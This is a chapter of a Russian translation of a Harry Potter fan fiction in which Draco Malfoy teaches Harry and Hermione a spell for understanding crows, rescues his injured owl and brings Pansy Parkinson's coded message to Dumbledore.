Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 7

На Рунах, устроившись в самом конце класса и старательно игнорируя торопливо строчащую в тетради Грейнджер, Драко глядел в окно, не обращая никакого внимания на профессора и вспоминая ночной разговор с Поттером, случившийся несколько дней назад. Он, конечно, вовсе не рассчитывал, что гриффиндорец назовет его другом и станет делиться с ним всеми своими секретами, но такого оскорбления тоже никак не ожидал. Хотя должен был, и все-таки… Драко нахмурился.

Тупой, шрамоголовый сын грязнокровки думает, что знает все на свете…

Хуже всего было то, что Драко не понимал, почему отпор Поттера так его задел. Или почему он не может выдержать взгляд Золотого мальчика, хотя глядеть сверху вниз на важных чиновников из Министерства для него не составляло никакого труда. Он вздохнул. Почему его так рассердило, что Поттер оказался таким же невеждой, как и все остальные?

За окном сорвалась и разбилась сосулька, прервав размышления Драко и остальных студентов. Теперь, когда буран прекратился и потихоньку начало пригревать солнце, звук трескающегося льда стал привычным. Из-за Волдемортовых манипуляций с погодой наступило странное время – неуютно холодное и невыносимо яркое – ни зима, ни лето. Это странное межсезонье напоминало Драко сумерки, таинственную пору между днем и ночью. И, как и сумерки, оно делало его беспокойным, нетерпеливым, вызывало чувство, что вот-вот случится нечто неожиданное. Днем занятия сливались в неясный поток, ночи были заполнены приготовлением зелий. Вестей от родителей и друзей по-прежнему не было, и Драко постепенно начал терять  надежду.

Отцовский дневник немного помогал сгладить тяжелое чувство. В редкие свободные минуты после окончания занятий и перед появлением Северуса юноша растягивался на диване в гостиной и читал. Страница за страницей перед ним  разворачивалась жизнь его семьи. После случая с отравлением детские жалобы Люциуса прекратились, а жажда новых знаний и секретов стала расти. Постепенно стало явным его восхищение заклятьями, а почерк, поначалу неуклюжий, превратился в уверенный и элегантный.

К своему глубокому удовлетворению Драко узнал, что отец был далеко не так хорош в зельях, как он сам. Юный Люциус с трудом мог приготовить зелья, с которыми легко справлялся практически любой пятикурсник, и вскоре дед оставил попытки научить его чему-то более сложному. Люциусу просто не хватало терпения, которое необходимо для работы с зельями, да и особенности разных ингредиентов никогда не интересовали его. Драко же за годы обучения в Хогвартсе понял, что успеха в зельеварении можно добиться, только искренне полюбив этот предмет. А под руководством Северуса это было неизбежно. Иногда крестному приходилось буквально силком вытаскивать завороженного Драко из своего огромного хранилища, чтобы вернуть к работе.

Но в неспособности Люциуса к зельеварению юный Малфой увидел причину своих неудач с любовными зельями.

С другой стороны, в том, что касалось заклинаний, Драко пошел по стопам отца. Порчи и проклятья давались ему легко, но в то время как он находил их довольно интересными, Люциус был ими просто очарован. Целые абзацы в дневнике он посвящал описанию малейших подробностей воздействия заклятья на жертву, вплоть до упоминания, как высыхает и трескается кожа и вытекают глаза после особенно удачной «импедименты»…

 Люциус с увлеченностью одержимого сочинял сложные, напевные заклинания, достаточно мощные, чтобы повлиять на саму природу, но слишком длинные для сражений. Перечитывая каждое из них, нацарапанное на полях, с зачеркнутыми и переписанными словами, Драко ловил себя на том, что шевелит губами в такт - ему ужасно хотелось их испытать.

К сожалению, читать дневник в классе было нельзя. Золотая окантовка кожаной обложки и пожелтевшие страницы слишком отличались от привычного вида учебников, и юноше не хотелось возбуждать всеобщее любопытство. После того, как слухи об инциденте на Зельях расползлись по школе, осталось слишком мало мест, где Драко мог бы читать без опаски. Хогвартс превратился в тюрьму. Даже гостиная временами казалась неуютной, душной и чужой.

Когда прозвенел звонок, Драко поднялся и вышел, ни на кого не глядя. Вместо главного холла, где временно проходили занятия Хагрида, он отправился в библиотеку. Северус не будет возражать, если он пропустит Уход, а то, что туда отправится Уизли, который явно недолюбливал этот предмет, только добавляло удовольствия.

Когда он вошел, мадам Пинс неприязненно поглядела на него, но ничего не сказала. Снейп ясно дал понять всем профессорам, что он, как декан и опекун юного Малфоя, позволяет тому ходить в любую часть замка, когда вздумается. И предупредил самого Драко, что именно на нем будут проверяться их экспериментальные зелья, если крестник что-нибудь натворит. Конечно, кроме них двоих никто понятия не имел, что юноша обязан вести себя хорошо, и Драко намеревался держать это в тайне.

Не задерживаясь возле библиотекарши, слизеринец сразу направился в Запретную секцию. Будучи гостем, он не мог пользоваться привилегиями студентов, но зато у него были другие – например, свободный доступ в закрытые для остальных разделы библиотеки. Он не сомневался, что Пинс закатила истерику, когда Северус заявил ей об этом. Она вела себя с Драко так, словно он был каким-то чудовищем, но запретить ничего не могла. Даже Дамблдор дал свое позволение, хотя юный Малфой был уверен, что за подобной покладистостью что-то кроется. Постоянная жизнерадостность старика его настораживала.

Прохаживаясь среди стеллажей, юноша остановился в секции, посвященной мошенничеству и обману, разглядывая дюжины книг, стоящие на полках: «Койот, Локи и Курен: совершенствование обмана», «Грамматический разбор: как сплетать ложь с правдой», «Как обменять звезду на луну» и так далее. Большинство книг Драко уже встречал в необъятной библиотеке отца, от которой теперь остались лишь угли и пепел, но некоторые названия были ему незнакомы. Он постоял несколько минут возле полок, стараясь что-нибудь выбрать, и, наконец, остановился на «Обмане болотных огоньков» - практическом руководстве, обещающем научить читателей ловить неуловимых созданий, обводить вокруг пальца завзятых обманщиков и распутывать самые запутанные заклинания.

Драко не поверил ни единому слову, но тон предисловия был таким уверенным, что ему захотелось узнать, как автору удалось состряпать текст об искусстве обмана, который кто-то счел пригодным для Хогвартса. Под неодобрительным взглядом мадам Пинс он записал книгу и, повернувшись к одному из столов, заметил Уизли, который явно искал его. Драко быстренько нырнул обратно в Запретную секцию и принялся наблюдать оттуда.

Следовало ожидать, что рано или поздно рыжий появится здесь, решил он, недовольно поморщившись. Подождав, пока гриффиндорец повернет за угол, Драко потихоньку выскользнул из библиотеки, прошел чуть дальше, до следующего поворота, и бросился бежать. Он хотел скрыться до того, как Уизли поймет, что искать его в библиотеке бесполезно и отправится в подземелья. Добежав до гостиной, юноша быстро схватил метлу и теплую мантию, и бросился во двор.

Несколько минут спустя он уже был на улице. С карнизов свисали сосульки, снег был грязный и серый. На морозном воздухе дыхание превращалось в парок, и Драко быстро набросил на плечи мантию, не успев даже толком почувствовать холод. Бережно спрятав книгу в карман, он сел на метлу и мягко оттолкнулся от земли. Подставив лицо ветру, он взлетел выше замковых шпилей и закружил среди облаков.

Драко знал, что выходить одному было рискованно, но ему отчаянно хотелось оказаться подальше от мрачных подземелий и переполненных залов. С высоты замок походил на кукольный домик, а квиддичное поле и вовсе казалось лежащей рядом игрушкой.

Поглядев вниз, он заметил, как во дворе появилась рыжая точка. Раздраженно фыркнув, юноша взлетел еще выше, укрывшись за ближайшим облаком, хотя был уверен, что Уизли не сможет увидеть его на такой высоте. Неудивительно, что Поттер бродит  ночами по школе. Если рыжий так настырно преследует тех, кто ему не нравится, можно только догадываться, какой он прилипчивый с друзьями.

Но Драко знал, что не может прятаться вечно. Жесткая рукоятка метлы почти сразу  надавила на едва начавшие сходить синяки и ноги разболелись. Надеясь, что Уизли его не заметит, слизеринец спикировал к зубчатому ограждению на дальней башне. Гладкие подошвы ботинок скользнули по льду, и юноша упал, ударившись плечом о каменную кладку. Застонав, он сел и глубоко вздохнул. Нечестно! Злому бурану Волдеморта не удалось его прикончить, так теперь чертов лед старается довершить начатое! Бросив метлу, Драко стукнул по скользкой поверхности кулаком, но лишь ободрал костяшки. И синяк на плече тут же отозвался болью.

- Несправедливо, - пробормотал юноша, подтянув колени к груди. Он потерял дом, родителей, друзей, свой чудесный Нимбус-2001, на котором были все необходимы чары, и ради чего? Чтобы словно испуганная маленькая змейка отсиживаться в норе и яростно шипеть на проходящих мимо животных, пытаясь притвориться ядовитой? Драко прижал ладонь к плечу, но оно заболело еще сильнее, так, что на глаза навернулись слезы. Он яростно вытер их и по привычке оглянулся – если бы Северус узнал, что его почти совершеннолетний крестник позволил себе так разнюниться, он бы не замедлил предоставить Драко настоящую причину для слез. 

Ветер распахнул полы его мантии, и юноша поспешно завернулся в нее поплотнее. Глупо было надеяться, что здесь можно будет почитать. Стоял такой сумрачный холод, что казалось, вот-вот пойдет снег. Глядя на Запретный лес было трудно поверить, что лето закончилось совсем недавно. Деревья стояли голые, обледеневшие, и даже в солнечном свете лес выглядел мрачно и зловеще. Дюжины ворон расселись на холодных ветках, прибившись друг к дружке и каркая так громко, что иногда заглушали ветер.

- Вот ты где!

Драко едва не подпрыгнул от неожиданности. Позади него появился Поттер на своей Молнии и спрыгнул на землю, даже не поскользнувшись. Слизеринец нахмурился и отвернулся.

- Здесь мне защита не нужна, - буркнул он, - и у меня нет настроения с тобой разговаривать.

- Это видно, - отозвался Гарри и все равно уселся рядом.

«Как он меня нашел?» – недоумевал Драко, изо всех сил стараясь не смотреть на гриффиндорца и вообще не подавать вида, что замечает его присутствие. Почему эти трое так упорно преследуют его днями напролет?

- Вот, - Поттер протянул ему сумку.

Драко лишь отодвинулся подальше, стараясь ее не касаться. Внутри могло находиться все что угодно, и к тому же он знал, что Поттер дружит с близнецами Уизли.

- Что это? Если ты думаешь, что я поддамся на дурацкую уловку…

- Уймись, Малфой, - Гарри пихнул сумку ему в руки. – Я не ты, там нет ничего страшного.

Драко еще сильнее нахмурился, но развязал веревку, стягивающую горловину, и заглянул внутрь. Его гримаса немедленно сменилась довольной улыбкой - на дне мешка лежали две мертвые гидры.

- Они погибли сегодня утром, - объяснил Поттер. – Самый большой детеныш убил их. Хагрид собирался отдать их тебе, но тебя не было на занятии.

- Отдать мне? – переспросил Драко. – И он не ныл, что это я или Северус их прикончили?

- Он плакал, - пожал плечами Гарри. – И не смей тыкать это ему в лицо. Но он не дурак.

- Это еще вопрос, - негромко произнес Драко, так, чтобы Поттер не услышал. Все еще улыбаясь, он завязал мешок и отложил его в сторону.

- Это твоя метла? – вдруг спросил гриффиндорец и нагнулся поближе, чтобы рассмотреть как следует.

Драко помедлил с ответом. Нет, он нисколько не стыдился, но метла была далеко не новой, и после того как он столько бахвалился своим Нимбусом, явно проигрывала.

- Точнее, помело, - поправил он Поттера, умолчав о том, что сам редко вспоминает это название. – Семейное наследие.

- Я не успел разглядеть его той ночью, - добавил Гарри. – Оно кажется живым. 

Драко понял это, еще когда взял метлу в руки в первый раз. Сейчас рукоятка была еще тяжелее, чем раньше, и казалась свежесрубленной. На прутьях появились почки, готовые вскоре выпустить листья. Она даже пахла свежо – как зазеленевшее дерево. Драко провел пальцами по древку и крепче прижал метлу к себе.

- Как ты не свалился? – спросил Гарри. – Пролетел через всю страну в бурю и со сломанной рукой.

«Почему он спрашивает?» – удивился слизеринец. Или Поттер старается выудить информацию, или кто-то узнал об их разговоре на кухне и велел ему вести себя как следует. Портить отношения с их новым мастером зелий  - ну, ладно, пока не мастером, но специалистом – не лучшая идея во время войны. В любом случае, Драко занервничал. Не отвечая, он уставился на квиддичное поле. И мысль, которую он так старался отодвинуть подальше, вернулась снова.

Он знал - глупо грустить о том, что все игры Слизерина проиграны, не начавшись, когда члены команды могут попросту не добраться до Хогвартса живыми и невредимыми, их родители – погибнуть, а Волдеморт – уничтожить весь мир. Драко снова посмотрел на помело. Глупо мечтать о квиддиче, когда у него даже нет нормальной метлы.

Впрочем, помело верно послужило ему на пути через всю страну и даже во время схватки с Пожирателями. Кто знает, на что еще оно способно?

- Когда у вас первая игра? – спросил он.

- Что? – недоуменно моргнул Поттер.

- Квиддич, - вздохнул Драко при виде такой очевидной глупости. – С кем вы играете первыми?

- А… кажется с Хаффлпафом. Через месяц. А потом… ох… - поняв, о чем думает Драко, Поттер тоже погрустнел. Не то чтобы это не приходило ему в голову раньше - конечно, гриффиндорцы загодя радовались грядущим победам, но вид опечаленного Малфоя превратил потерю достойных соперников в небольшое военное поражение.

Но он не успел ничего сказать. Они не слышали обеденного колокола, но увидели, как во двор выбежали студенты и затеяли игру в снежки. Глядя на них, Драко тяжело вздохнул. Ему совершенно не хотелось привлекать к себе внимание, а значит, придется сидеть на башне до конца перерыва и ждать, когда все разойдутся. Хотя, если бы рядом оказалось открытое окно…

Ему повезло. Одно из окон астрономической башни было открыто. Он поднялся, подобрал метлу и привязал мешок с гидрами к древку. Позади него Поттер тоже встал и подхватил свою Молнию.

Драко чувствовал себя немного глупо, влетая в замок на метле, но лучше так, чем приземляться во дворике, полном любопытных студентов. Класс оказался пустым, и он благополучно приземлился. К его немалому раздражению, Поттер приземлился рядом, явно намереваясь следовать за ним, куда бы он ни отправился.

- Тебе что, больше нечего делать, кроме как гоняться за мной? – раздраженно рявкнул слизеринец. – Иди, займись чертовым квиддичем или еще чем-нибудь. Похвастайся друзьям, что ты выучил темное заклинание…

- Я как раз об этом хотел с тобой поговорить, - перебил его Гарри. – Мы с Гермионой уже освоили «ризану», и она думает, что пора переходить к следующему.

Уже? Забыв о еде, Драко отвернулся, чтобы скрыть удивление, и пошел к двери, стараясь выиграть время. Он не ожидал, что они так быстро научатся наколдовывать мишени, и еще не решил, какое заклинание покажет им следующим. Шагая впереди Поттера, чтобы не пришлось встречаться с ним взглядом, он решил, что надо набросать какой-нибудь план занятий на ближайшую пару месяцев.

Для начала нужно что-нибудь попроще. Парочку заклятий можно продемонстрировать экспромтом, а ночью полистать летопись и выбрать что-нибудь посущественнее. Если повезет, они не обратят внимания, что для следующего заклятья не требуются мишени, которые они так старательно учились наколдовывать.

- Crawenen, - тихонько заключил Драко, и повернулся к Гарри. – Хорошо. Жди меня у хижины Хагрида через десять минут. Я покажу тебе еще одно заклинание, - и, не дожидаясь согласия гриффиндорца, он повернулся и отправился в подземелья. К счастью, Поттер не пошел следом.

В гостиной Драко убрал библиотечную книгу и выудил из одного из многочисленных шкафчиков небольшой деревянный ящичек. Короткое замораживающее заклинание - и тот покрылся льдом изнутри, как раз, чтобы гидры не испортились. На крышке Драко оставил записку – на случай, если Северус вернется раньше него – и отправился на улицу, следуя своим обычным маршрутом через полузабытые коридоры и боковые двери,  подальше от студентов.

Он заметил гриву Грейнджер раньше, чем саму хижину, и недовольно фыркнул:

- Просто здорово. Не мог обойтись без своей ручной грязнокровки. Шагу не может ступить без этой чертовой всезнайки.

Когда он подошел к гриффиндорцам, девушка уже недовольно хмурилась. Она наверняка заметила, как он что-то бормочет, и хотя не могла знать, что именно, было  легко догадаться.

- Ты опоздал, - заявила она вместо приветствия.

Не обращая на нее внимания, Драко повернулся к Поттеру, присевшему на замерзшую тыкву.

- Не здесь, - коротко сказал он. – Следуйте за мной, - и направился к кромке Запретного леса. Гриффиндорцы держались на шаг позади, а Драко поглядывал на деревья. На каждом расселось по небольшой стайке ворон. Слизеринец оглянулся на Гарри:

- Для этого заклинания нужны сороки, вороны или любые черные птицы. Главное, чтобы их было правильное количество. От того, сколько их, зависит, что ты услышишь. Есть специальный стишок, чтобы запомнить нужное число.

- О, я его знаю, - встряла Грейнджер. – Сорочий стишок, да? Раз, два - упала гора; три, четыре – прицепило…

- Нет, - покачал головой Драко и улыбнулся, когда она от удивления захлопнула рот, клацнув зубами. – Маггловские стишки это бессмысленная чушь, где наши заклинания перевраны и так же бесполезны, как и те, кто их перевирает. Слушайте внимательно: «Раз и два - печаль и радость, - заговорил он медленно и уверенно, - три, четыре – смерть и жизнь. Пять и шесть - с небес до ада, семь – чтоб заговор сложить».

Он остановился у молодого деревца, тонкие ветки которого согнулись под тяжестью семи ворон. Птицы молча уставились на него.

- Это никакое не прорицание, - объяснил Драко Поттеру, так, чтобы Грейнджер поняла, что ее игнорируют. – Надо просто стараться внимательно их слушать. Если птиц будет меньше семи, смысл их слов изменится.

- Что ты имеешь в виду? – спросил Гарри.

Грейнджер сердито поглядела на Драко и хмыкнула:

- Что если ты спросишь двух воронов о погоде, они над тобой посмеются.

Драко едва удержался от едкого комментария, но вместо ответа поднял палочку и мягко произнес:

- Crawenen.

Гриффиндорцы послушно повторили. Несколько секунд казалось, что ничего не происходит, но постепенно вместо резкого карканья подростков окружил вкрадчивый шепот:

- …дети никак не уходят…

- …может, хотят швырнуть в нас камнем…

- …тогда мы выклюем им глаза… …мерзкие людишки…

- …из них выйдет неплохая закуска, когда они перестанут дергаться…

- …иногда так сложно определить - сдохли они, или еще нет…

- … прогоняют нас прочь, стоит клюнуть…

Вздрогнув, девушка повернулась к Драко:

- Сколько длится это заклинание?

Он пожал плечами:

- Для тебя – минут пять. Для меня – полчаса.

Поттер явно хотел спросить почему так, но вороний шепот перебил его.

- …противные дети говорят о нас…

- …все равно ничего им не скажем…

- …нас уже ждет ужин неподалеку…

- …но сова еще трепыхается…

- …стоящий ужин, стоящий…

Драко встрепенулся:

- Сова?

- …хочет нашу сову?..

- …хочет забрать наш ужин?..

- …не дадим похитить ужин!.. – птицы яростно взмахнули крыльями. – Наш ужин!.. наш!..

- …мы ждали и теперь он наш… наш…

- …противные дети хотят забрать нашу сову…- и семь ворон разом поднялись в воздух, описали широкий круг и полетели вглубь леса.

К удивлению гриффиндорцев, Драко кинулся следом, чертыхнувшись вполголоса, что не захватил метлу. Пока они старались за ним угнаться, слизеринец уже перепрыгнул через корни упавшего дерева и начал продираться сквозь заросли кустарника. Его мантия зацепилась за ветку, он поспешно расстегнул ее и сбросил. К счастью, между замерзших деревьев птицы не могли лететь быстро, и Драко удалось не потерять их из виду, пока, наконец, они не опустились на землю, окружив большого серого филина.

- Пошли прочь от него! – закричал слизеринец, подбегая ближе. Споткнувшись, он едва не наступил на одну из ворон. Сердито закаркав, стайка взлетела и расселась на ветках неподалеку, хмуро уставившись на юношу. Драко поспешно опустился перед филином на колени. Большая серая птица лежала, распростершись в грязи и мерзлых листьях, и по царапинам на земле было видно, где она упала и старалась подняться.

- Илмаузер, - прошептал Драко, осторожно коснувшись вытянутого крыла. Приняв прикосновение за нападение голодных ворон, филин сердито ухнул и забил крыльями, но не смог сдвинуться с места. Усыпив его, Драко очень осторожно сложил птице крылья и  поднял на руки.

- Он твой? – уточнил Гарри, только теперь догадавшись, почему у входа в Слизерин такой странный пароль. – Что он здесь делает?

- Наверное, Пэнси отправила его ко мне, - отозвался Драко, заметив привязанный к лапке питомца крошечный свернутый пергамент. Поежившись от холода, он поднялся и пошел прочь, к кромке леса, не обращая внимания на сердитые окрики ворон: «гадкий мальчишка» и «подлый ворюга». Стая преследовала ребят до самой опушки, а парочка  даже попыталась клюнуть Драко в лицо, но Гарри отогнал их воспламеняющим заклинанием, прежде чем они успели подлететь слишком близко.

Когда они вошли во внутренний дворик, студенты уставились на слизеринца и зашептались. Кое-что из их разговоров донеслось до Драко.

- …смотри, как он держит бедную птичку…

- …настоящему темному магу было бы плевать…

- …думаешь, он и в самом деле темный маг?..

- …наверное, ты же читала «Пророк»!..

- …ты же знаешь, кто его отец…

- …но его снова оправдали…

- …Дамблдор не позволил бы остаться темному…

Пусть гадают, решил Драко. Пока они не уверены, они не посмеют ничего предпринять. Все помнят, сколько волшебников пострадало и погибло из-за ложных обвинений. Они ничего не сделают, пока не будут точно знать, что он собой представляет, а уж Драко позаботится, чтобы они никогда этого не узнали. Да, он вредный, мелочный, злобный, жестокий и иногда даже страшный. Но темный ли? Пока неизвестно.

Кроме мадам Помфри в лазарете никого не было. Слизеринец решительно вошел и опустил Илмаузера на ближайшую кровать. Ужасно удивившись птице в своем лазарете, ведьма быстро подошла и посмотрела сначала на филина, потом на его хозяина.

- Надо отнести его Хагриду, -  сказала она юноше с укоризной. – Я лечу людей, а не…

- Я не могу доверить ему Илмаузера, - отрезал Драко, не сдвинувшись с места. – Вы можете сделать хоть что-нибудь?

Она ошеломленно уставилась на него и фыркнула:

- Малфои! –  а затем отошла к шкафчику возле своего стола и зазвенела там склянками, выбирая нужные. Вдруг Драко в руки пихнули что-то мягкое. Он поднял глаза на Поттера, а затем взглянул вниз и увидел, что это его мантия.

- Ты ее подобрал, - удивленно заметил он.

- На обратном пути, - кивнул Гарри. – Ты явно о ней забыл.

Стряхнув с мантии снег и листья, Драко накрыл ею замерзшего филина и осторожно, чтобы не взъерошить перья, расправил ткань. Согревшись, Илмаузер заметно успокоился.

- Он так тебе дорог? – спросил Поттер.

- Отец подарил мне его, - сдавленно объяснил Драко.

Но филин был не просто подарком, вроде тех, что Драко частенько выпрашивал у родителей. Илмаузер стал сюрпризом от Люциуса к совершеннолетию сына. Такие знаки внимания - свидетельства отцовской гордости - юный Малфой получал редко, и научился ценить и радоваться каждому. Он рассеянно покрутил на пальце серебряный перстень, украшенный такой же змеей, как и их фамильный герб - подарок отца на тринадцатилетие.  

Несмотря на свои протесты, что филином должен заняться Хагрид, Помфри осмотрела его, напичкала лекарствами, и вздохнула.

- Как следует отдохнет, съест пару мышек, и все будет в порядке. Но я бы не советовала пока его переносить. Пусть немного поспит, - тут она поглядела на гриффиндорцев. – А вам пора отправляться на занятия. Колокол вот-вот зазвонит.

- Уже? – ахнула девушка. – О, нет! Все мои учебники в гостиной!

- Тем более стоит поторопиться, - заметила медсестра.

Грейнджер ринулась из лазарета, а Поттер задержался.

- Как ты узнал, что они говорят о твоем филине? – спросил он Драко. – Почему ты решил сегодня научить нас именно этому заклинанию? Оно никак не связано с предыдущим.

Слизеринец пожал плечами и немедленно поморщился – застуженные мышцы отозвались болью.

- Я не знал. Просто повезло, - он поглядел на Поттера, но сил не хватило даже на стоящую ухмылку. – У тебя занятия. Давай, топай.

- У тебя тоже, - упрямо возразил гриффиндорец.

- Он никуда не пойдет, - вмешалась Помфри, и неодобрительно посмотрела на Драко, недовольная его грубостью. – А ты отправляйся. Здесь он в безопасности, а тебе не стоит опаздывать.

С подозрением поглядев на слизеринца, Гарри развернулся и вышел, не забыв бросить последний взгляд через плечо. Оказавшись, наконец, наедине с медсестрой, Драко устало вздохнул и сел.

- Неужели все так очевидно? – спросил он.

- Если знаешь, на что смотреть, - ответила ведьма. Отыскав бутылочку с его лекарством, она протянула ее юноше:

- Держи. Один глоток, помнишь? А потом тебе лучше прилечь и вздремнуть. Что ты вообще делал на улице в такой холод?

- Бегал по лесу без мантии, - честно ответил он и глотнул микстуру, даже не поморщившись. После стольких лет употребления зелий Северуса это было совсем несложно.

- Ясно. Думаю, именно это и вызвало приступ, - кивнула Помфри, забирая бутылочку.

- Вы можете определить, почему мой филин упал? – спросил юноша.

- Скорее всего, он провел слишком много времени на морозе, - неуверенно произнесла ведьма. – Но вполне возможно, что его прокляли. Теперь трудно сказать. Давай, ложись, я разбужу тебя перед ужином.

Драко не хотелось пропускать Чары и Зелья, но лучше послушаться сейчас, чем отвратительно чувствовать себя весь день. Когда Помфри отправилась назад за свой стол, он снова посмотрел на филина и вспомнил о записке на его лапке. Отвязав ее, юноша прошел к кровати напротив, лег и только тогда развернул крошечный пергамент.

«Много сказать не могу, боюсь волков. Забились в нору. Вылезем, когда волки наедятся. П.»

Увидев знакомый шифр, Драко улыбнулся. Он осторожно сжал записку в кулаке и засунул руку под подушку. Его друзьям все еще угрожает опасность, но, по крайней мере, они живы. Беспокойство, несколько недель мучившее его, наконец, утихло. Задремав, он первый раз за последние несколько дней не видел снов.

Несколько часов спустя его потрясли за плечо:

- Вставай, ленивый ребенок.

Драко сразу узнал голос наставника. Сонно моргая, он без лишних слов протянул Мастеру зелий записку Пэнси и сел. Если Северус на самом деле так рассержен, то это может его немного успокоить. Где-то неподалеку недовольно ворчала Помфри.

- Сколько я спал? – спросил юноша, заметив, как удлинились тени.

- Достаточно, чтобы пропустить два урока, - резко заявил Снейп.

- Слишком мало, - встряла Помфри, сердито глядя на профессора. Она потрогала лоб Драко. – Температуры нет, лихорадки тоже… ладно, можешь идти. И никаких больше прогулок по лесу без мантии, понял?

Юноша кивнул и спустил ноги с кровати, приготовившись к выговору от крестного. Но его так и не последовало. Драко удивленно взглянул на Мастера зелий и изумился еще больше, увидев, что он улыбается.

- Северус?..

- Поднимайся, - сказал тот, направляясь к дверям. – И не забудь своего филина.

Как и полагается хорошему ученику, Драко поспешил к кровати, где лежал Илмаузер, и откинул мантию. К его огромному облегчению, филин ухнул, встал, расправил крылья и встряхнулся, после чего деловито вспорхнул на вытянутую руку хозяина. Выйдя за дверь, Драко заметил, что Северус направляется не к подземельям, а совсем в другую сторону. Юноша торопливо нагнал его, слегка поморщившись - держать руку ровно под внушительной птицей было тяжело.

- Куда мы идем?

- К директору, - отозвался Мастер зелий. – Чтобы доставить послание лично.

Удивленно распахнув глаза, Драко забежал чуть вперед, чтобы видеть лицо крестного.

- Но… кроме нас никто не поймет, о чем там говорится.

- Именно.

Они подошли к горгулье и та послушно посторонилась, повинуясь прежнему паролю. Поднимаясь, Драко услышал голоса и вздохнул. Грейнджер и Поттер уже были там. Слизеринцы вошли тихо и услышали конец разговора.

- …уверена, что видела записку, - настаивала девушка.

- А потом я заметил, что Драко дрожит, - добавил Поттер, – и совсем забыл о ней.

- Дрожит? – с сомнением переспросила Грейнджер. – Ты уверен? Я ничего такого не…

- Почему бы нам не спросить их самих, - с улыбкой прервал гриффиндорцев Дамблдор, жестом указав Драко и Северусу на кресла. – Ну и наделали вы сегодня шуму, мистер Малфой.

- Записка действительно была, директор, - произнес Северус, прежде чем Драко успел вымолвить хоть слово, и передал клочок пергамента старику. Тот быстро просмотрел его и недоуменно нахмурился.

- «Много сказать не могу, боюсь волков. Забились в нору. Вылезем, когда волки наедятся. П.» - озадаченно прочел он. – Полагаю, мисс Паркинсон боялась, что сову могут перехватить. А замечание о волках, скорее всего, относится к новолунию… но «забились в нору»? Боюсь, я не слышал раньше подобного выражения.

- Вы и не могли его слышать, - объяснил Северус. – Но оно прекрасно известно всем детям темных магов. Это что-то вроде прибауток или выдуманного языка. Вырастая, их обычно забывают.

- А… - понимающе кивнул Дамблдор,  - это как-то связано с тем, как ваши дети растут, спрятанные от мира.

- Точнее, пока они маленькие, их воспринимают почти как детенышей, - поправил Мастер зелий и презрительно усмехнулся, когда Грейнджер возмущенно ахнула. – Пока они не научатся защищать себя сами, их необходимо маскировать и прятать, как крольчат в норе. Только недавно мы начали разрешать им посещать школы. Вот что имела в виду мисс Паркинсон. Они появятся, когда наступит новолуние, и ночи будут достаточно темными, чтобы можно было передвигаться незамеченными.

- Почему она не сказала прямо? – спросил Поттер. – Любой темный маг все равно разгадает ее шифр, так в чем смысл?

Дамблдор вздохнул и откинулся на спинку кресла.

- В том, чтобы мы ее не поняли, - объяснил он, глядя на пергамент. – Мисс Паркинсон ясно дает понять, что не доверяет никому кроме мистера Малфоя. Никому, даже мне.

- Я предупреждал вас, что война не закончится со смертью Темного лорда, - кивнул Снейп. – Даже если Люциус и его рыцари станут биться бок о бок с вашими аврорами, в ту же минуту, когда падет последний Пожиратель, они снова обратятся против вас, как было последнюю тысячу лет.

- Нет, - покачал головой Дамблдор, сняв очки и слегка помассировав переносицу, словно у него вдруг разболелась голова. – На этот раз все будет намного хуже. Силы света будет вдохновлять победа, а силы тьмы предпочтут ударить сразу же, пока мы не пришли в себя. И в конце концов… - он замолчал.

- Последуют потери, к которым вы не готовы, - закончил вместо него Снейп. – Даже Хогвартс не останется в стороне. Могу вас уверить, что наши дети среагируют также быстро. Их воспоминания постоянно живут в кошмарах.

Некоторое время все молчали. Драко посмотрел на Грейнджер – та выглядела недовольной и озадаченной, словно пыталась разгадать загадку и знала, что каких-то подсказок не хватает. Переведя взгляд на Поттера, он моргнул. Тот смотрел прямо на него. Несколько секунд Драко терпел, но потом отвернулся. Взгляд гриффиндорца был таким пронзительным, что, казалось, тот видит Драко насквозь.

- А вы, мистер Малфой? – спросил вдруг Дамблдор, снова завладев вниманием юного слизеринца. - Вы учились здесь больше шести лет, познакомились с детьми «с другой стороны», так сказать. Сможете ли вы убить тех, кто успел стать вашими товарищами?

Глядя на самого могущественного волшебника светлой стороны, Драко ни секунды не промедлил с ответом. Все равно лгать Дамблдору было бесполезно.

- Если такое случится, я больше не буду их товарищем,  - ответил он. – Я стану просто темным магом, - при мысли о том, что застарелая война может вспыхнуть снова, он понизил голос до зловещего шепота. – И я напомню им, почему они так нас боятся.

Дамблдор кивнул, словно именно такого ответа и ожидал, и обратился к Мастеру зелий.

- Северус, спасибо, что довел это до моего сведения. Мне бы хотелось еще побеседовать с тобой, но не сегодня. Мы все устали.

Сдержанно кивнув, Снейп поднялся и направился к выходу. Драко последовал за ним, упорно глядя наставнику в спину, чтобы не встречаться взглядом с Поттером.

Покинув кабинет, они не разговаривали. Юношу мучили тысячи вопросов. Как Пэнси доберется сюда? Почему отец не прислал весточки? Думаешь, мама еще жива? Ты в самом деле полагаешь, что война начнется снова, так быстро? Но он знал, что у Мастера зелий нет на них ответов и он только рассердится, если его спросить.

Когда они подошли к лестницам, Драко шагнул ближе к крестному и крепче прижал к себе Илмаузера. Занятия закончились не так давно, и в коридорах все еще было полно студентов. При виде слизеринцев все разговоры немедленно стихали, и ученики провожали их настороженными взглядами. Однако стоило им пройти, вслед неслись шепотки:

- …слышал, он заболел, спасая свою сову…

- …но он все еще Малфой…

- …они же против Сами-знаете-кого…

- …может быть…

- …ага…

Когда Драко и Мастер зелий достигли подземелий, тишина стала для них желанным облегчением. Пересадив филина на другую руку, юноша ласково погладил его. Ему следовало бы отослать птицу в совятню, но он хотел еще немного побыть с питомцем.

- Что ж, - произнес Северус, поглядев на филина, - по крайней мере, твоя безрассудность должна смягчить наиболее упорные слухи, бродящие по школе.

Драко не стал спорить. Убегать в Запретный лес в погоне за стаей ворон было глупо, и неважно, что стало тому причиной. Ему повезло, что птицы не соврали, что в лесу его не поджидали Пожиратели, и что им не встретились кентавры.

- Какие слухи? – спросил он.

- Ты разве не слышал, о чем все шептались?

- Слышал кое-что, но, увидев меня, они обычно замолкают.

